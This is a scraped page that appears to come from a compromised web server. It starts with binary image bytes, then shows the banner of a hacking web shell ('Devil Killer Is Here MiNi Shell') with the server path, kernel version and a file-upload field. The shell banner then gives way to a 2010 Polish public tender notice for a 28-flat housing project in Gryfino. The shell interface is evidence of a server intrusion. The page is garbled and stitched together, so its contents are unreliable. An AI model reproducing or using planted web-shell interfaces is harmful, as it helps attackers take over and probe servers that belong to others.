JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100909/284992-N-2010.html

<p class="kh_header"><b>Gryfino: BUDOWA  BUDYNKU MIESZKALNEGO 28-RODZINNEGO
 PRZY UL. KOŁŁĄTAJA NA DZIAŁCE NR 354/1 W GRYFINIE WRAZ Z IFRASTRUKTURĄ  
                                                             TOWARZYSZĄCĄ</b><br>
<b>Numer ogłoszenia: 284992 - 2010; data zamieszczenia: 09.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gryfińskie Towarzystwo Budownictwa Społecznego Sp. z o.o. , ul. Grunwaldzka 1, 74-100 Gryfino, woj. zachodniopomorskie, tel. 091 4045031, faks 091 4162728.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.tbs.gryfino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: budownictwo i obiekty  komunalne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA  BUDYNKU MIESZKALNEGO 28-RODZINNEGO
 PRZY UL. KOŁŁĄTAJA NA DZIAŁCE NR 354/1 W GRYFINIE WRAZ Z IFRASTRUKTURĄ  
                                                             TOWARZYSZĄCĄ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie wszelkich czynności i prac niezbędnych do prawidłowego zrealizowania zamówienia, polegającego na budowie budynku mieszkalnego, 28-rodzinnego na dz. Nr 354/1 , przy ul. Kołłątaja w Gryfinie wraz z infrastrukturą techniczną.  w zakresie rzeczowym ujętym w dokumentacji projektowej, opracowanej przez Biuro Projektowo-Konsultingowe STRUKTURA spółka z o.o.  z siedzibą w Szczecinie przy ul. Grodzka 20 oraz w Specyfikacji Technicznej Wykonania i Odbioru Robót, zwanej dalej ST Rozdziale XIII SIWZ.
 Zakres prac obejmuje budowę budynku mieszkalnego 28-rodzinnego wraz infrastrukturą techniczną    i zagospodarowaniem terenu:
-	budynek  wraz z instalacjami wewnętrznymi
-	sieci i przyłącza kanalizacji sanitarnej
-	sieci i przyłącza kanalizacji deszczowej
-	kotłownia gazowa w budynku
-	sieć i przyłącza wodociągowe
-	oświetlenie terenu
-	zagospodarowanie terenu wraz z drogami, parkingami i chodnikami
Powierzchnia zabudowy budynku 468,64 m2 , kubatura 5995,21 m3, ilość mieszkań 28 , powierzchnie dróg wewnętrznych 873,3 m2 , powierzchnia chodników 185,7 m2 ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 45.30.00.00-0, 45.33.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 365.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> sto pięćdziesiąt tysięcy PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest uprawniony do występowania w obrocie prawnym, zgodnie z   
  	wymaganiami ustawowymi:
Zamawiający uzna warunek za spełniony, jeśli wykonawca załączy do oferty Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub zgłoszenia do ewidencji działalności , wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada wiedzę i doświadczenie niezbędne do wykonania  
    zamówienia:
Zamawiający uzna warunek za spełniony, jeśli wykonawca wykaże co najmniej trzy  realizacje jako Generalny Wykonawca zrealizowanych w przeciągu ostatnich trzech lat i polegających na budowie budynków  mieszkalnych wielorodzinnych, w tym :
- przynajmniej jedna realizacja - budynek o kubaturze min.  5 tys. m3 ,     
- pozostałe realizacje - budynki o kubaturze  min. 3 tys. m3 .
W przypadku oferty wspólnej (konsorcjum)   Lider konsorcjum powinien spełniać  warunek wybudowania minimum jednego budynku o kubaturze pow. 5 tys. m3 oraz przynajmniej dwóch budynków o kubaturze min. 3  tys. m3 .

      Wykonawca przedstawi Wykaz wykonanych w okresie ostatnich trzech lat 
        robót    budowlanych , jeżeli   okres działalności jest krótszy - w tym    
        okresie ,  odpowiadającym swoim   rodzajem i wartością robotom 
        budowlanym stanowiącym przedmiot  zamówienia , z  
        podaniem  ich wielkości ,    wartości  oraz dat wykonania  i   odbiorów oraz 
        dokumenty -   referencje , potwierdzające,  że roboty te zostały wykonane 
        należycie .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje sprzętem niezbędnym do realizacji zamówienia
       Zamawiający uzna warunek za spełniony, jeśli wykonawca przedstawi wykaz 
       sprzętu , którym  dysponuje , niezbędnego do realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje pracownikami zdolnymi do wykonania zamówienia:
Zamawiający uzna warunek za spełniony, jeśli Wykonawca na dzień 31.12.2009 r. zatrudniał nie mniej niż 50 osób i wśród pracowników, którzy będą realizować zamówienie, o udzielenie którego toczy się niniejsze postępowanie, są przynajmniej 3 osoby legitymujące się uprawnieniami bez ograniczeń w branżach: budowlanej, sanitarnej i elektrycznej - po 1 osobie na branżę.
Spełnienie tego warunku Zamawiający stwierdzi na podstawie dokumentów: 
-	uprawnienia do sprawowania samodzielnych funkcji technicznych w 
             budownictwie 
-	oraz aktualna przynależność do Izby Inżynierów Budownictwa 
-	informacja o przeciętnej liczbie zatrudnionych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada potencjał ekonomiczny niezbędny do wykonania   
      zamówienia:
Zamawiający uzna warunek za spełniony, jeśli :
Wykonawca w ostatnich 2 latach (2008, 2009) realizował sprzedaż (obrót) o wartości przeciętnie rzędu 10 mln PLN rocznie, co stwierdzi w oparciu o dołączone Sprawozdanie finansowe za rok 2008 i 2009 wraz z opinią biegłego rewidenta . W przypadku wykonawcy nie zobowiązanego do sprawozdań finansowych należy załączyć inne dokumenty określające obroty oraz zobowiązania i należności . W przypadku oferty wspólnej ( konsorcjum ) warunek ten powinien spełnić w 80%      Lider konsorcjum  a konsorcjum jako całość w 100% ;
Na potwierdzenie tego faktu Wykonawca przedstawi Sprawozdanie finansowe za rok 2008 i 2009 .

Wykonawca  znajduje się w sytuacji finansowej, zapewniającej wykonanie 
     zamówienia:
Zamawiający uzna warunek za spełniony, jeśli Wykonawca legitymuje się realną zdolnością do zaciągnięcia kredytu obrotowego w wysokości nie mniejszej niż 1.500.000 PLN (kwota uzasadniona wartością zamówienia ,  koniecznością zaawansowania własnych środków Wykonawcy w wysokości 20% wartości robót , wynikającą z warunków płatności oraz  spodziewanym poziomem średnio miesięcznego zaangażowania środków Wykonawcy w okresie do 3 miesięcy przy pożądanym jak najkrótszym okresie realizacji zamówienia, jak najdłuższym terminie płatności faktur i brakiem możliwości udzielenia przez finansujący inwestycję Bank Gospodarstwa Krajowego  .
Spełnienie tego warunku Zamawiający stwierdzi na podstawie Informacji banku , w którym Wykonawca posiada rachunek , potwierdzającej wysokość posiadanych środków lub zdolności kredytowej Wykonawcy . 
Informacja powinna być wystawiona nie wcześniej niż trzy miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia .

                Wykonawca  jest objęty ubezpieczeniem od odpowiedzialności 
                 cywilnej w  zakresie prowadzonej działalności  gospodarczej w 
                  wysokości nie mniejszej niż 500 tys. PLN
 Spełnienie tego warunku Zamawiający stwierdzi na podstawie polisy od odpowiedzialności cywilnej z tytułu prowadzonej działalności</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 2 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykaz wykonanych w okresie ostatnich trzech lat   robót       budowlanych , jeżeli   okres działalności jest krótszy - w tym okresie ,  odpowiadającym swoim   rodzajem i wartością robotom budowlanym   stanowiącym przedmiot  zamówienia , z podaniem ich wielkości , wartości   oraz dat wykonania  i   odbiorów oraz dokumenty - referencje , potwierdzające,   że roboty te zostały wykonane należycie .</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 10.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Sposób dokonania oceny spełnienia warunków udziału w postępowaniu  wymaganych od wykonawców , określony został według formuły -spełnia - - nie spełnia-. Ocena spełnienia warunków dokonana będzie wyłącznie na podstawie dokumentów żądanych w niniejszym ogłoszeniu i przedstawionych przez wykonawcę wraz z wnioskiem</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana personelu kluczowego Wykonawcy :
    Na pisemny wniosek wykonawcy dopuszczalna jest zamiana personelu kluczowego wykonawcy. Wniosek winien wskazywać zakres zmiany oraz zawierać dokumenty potwierdzające spełnienie warunków udziału w postępowaniu odnoszące się do członka personelu kluczowego, którego dotyczy zmiana. Zmiana dopuszczalna jest wyłącznie  za zgodą Zamawiającego.
2. Zamiana terminu realizacji przedmiotu umowy:
2.1 W uzasadnionych przypadkach, za zgodą zamawiającego dopuszcza się zmianę terminu realizacji przedmiotu zamówienia. 
Wydłużenie okresu realizacji przedmiotu zamówienia jest dopuszczalne o ile zachodzi co najmniej jedna z poniższych przesłanek:
- w przypadku nieodpowiednich warunków atmosferycznych, w celu dotrzymania wymogów technologicznych Zamawiający dopuszcza przesunięcie terminu wykonania robót.
	Przesunięcie ww. terminu Zamawiający warunkuje złożeniem przez Wykonawcę stosownego wniosku oraz dokumentów wskazujących, że zachowanie wymogów technologicznych w danych warunkach atmosferycznych jest niemożliwe ,np. informacja o stanie pogody z Biura Prognoz . W przypadku nieodpowiednich warunków atmosferycznych, w celu dotrzymania wymogów technologicznych Zamawiający dopuszcza przesunięcie terminu wykonania robót.
Przesunięcie ww. terminu Zamawiający warunkuje złożeniem przez Wykonawcę stosownego wniosku oraz dokumentów wskazujących, że zachowanie wymogów technologicznych w danych warunkach atmosferycznych jest niemożliwe  
- nastąpiło wstrzymanie wykonania prac na okres nie krótszy niż 28 dni z innych przyczyn niezależnych od   wykonawcy 
- nastąpiła konieczność wykonania prac dodatkowych których nie można było wcześniej przewidzieć i nie wynikają  one z opisu przedmiotu zamówienia, a wykonanie tych prac ma wpływ na termin wykonania robót wskazanych w opisie przedmiotu zamówienia. 
- na wniosek wykonawcy termin realizacji przedmiotu zamówienia może zostać skrócony. 
Wykonawcy z tytułu zmiany terminu wykonania przedmiotu zamówienia nie będzie przysługiwało dodatkowe wynagrodzenie, w tym wynagrodzenie za czas przestoju.
3. Zmiana wartości umowy
3.1. W przypadku urzędowej zmiany podatków lub  opłat     wynagrodzenie umowne ulega odpowiedniej   zmianie. Zmiana wartości zostanie dokonana    zgodnie ze znowelizowanym stanem prawnym. 
3.2 .W przypadku zwiększenia lub zmniejszenia ilości     dwustronnie uzgodnionych robót  wynikających  ze  zmiany technologii wykonania , z zastrzeżeniem iż    zmiana taka nie może przekroczyć 20% wartości    wynagrodzenia umownego.
4. Zmiany technologii wykonania elementów robót
4.1. Na wniosek wykonawcy, za zgodą zamawiającego,  w trakcie prowadzenia inwestycji, mogą być    dokonywane zmiany technologii wykonania   elementów robót. Dopuszcza się je tylko w    przypadku gdy proponowane przez niego    rozwiązanie jest równorzędne lub lepsze    funkcjonalnie od tego jakie przewiduje projekt. W    tym przypadku wykonawca przedstawia projekt  
   zamienny zawierający opis proponowanych zmian   wraz z rysunkami. Projekt taki wymaga akceptacji     nadzoru autorskiego i zatwierdzenia do realizacji     przez zarządzającego. 
4.2. W przypadku gdy z punktu widzenia      zamawiającego  zachodzi potrzeba zmiany    rozwiązań technicznych  nie przewidzianych w    umowie, zamawiający  sporządza protokół    konieczności, a następnie dostarcza dokumentację    projektową na te roboty wraz ze zleceniem ich    wykonania. 
